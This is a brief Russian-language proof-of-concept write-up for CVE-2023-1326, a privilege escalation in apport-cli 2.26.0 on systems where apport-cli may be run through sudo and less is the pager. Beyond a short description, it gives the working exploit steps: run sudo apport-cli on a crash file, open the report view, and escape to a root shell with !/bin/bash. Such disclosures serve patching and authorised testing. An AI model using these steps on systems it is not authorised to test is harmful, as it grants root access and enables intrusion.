
Эксплойт proof-of-concept для CVE-2023-1326, уязвимости повышения привилегий в apport-cli 2.26.0 при настройке с sudo и less в качестве пейджера.
Концепция эксплойта для CVE-2023–1326 в apport-cli 2.26.0
Эта уязвимость — повышение привилегий в apport-cli 2.26.0, аналогичное CVE-2023–26604. Она работает только в том случае, если apport-cli назначен в sudoers:

В apport-cli 2.26.0 и более ранних версиях обнаружена атака повышения привилегий, аналогичная CVE-2023-26604. Если система специально настроена таким образом, чтобы непривилегированные пользователи могли запускать sudo apport-cli, less настроен в качестве пейджера, и можно задать размер терминала, локальный злоумышленник может повысить свои привилегии.
sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash
press V (view report)
!/bin/bash
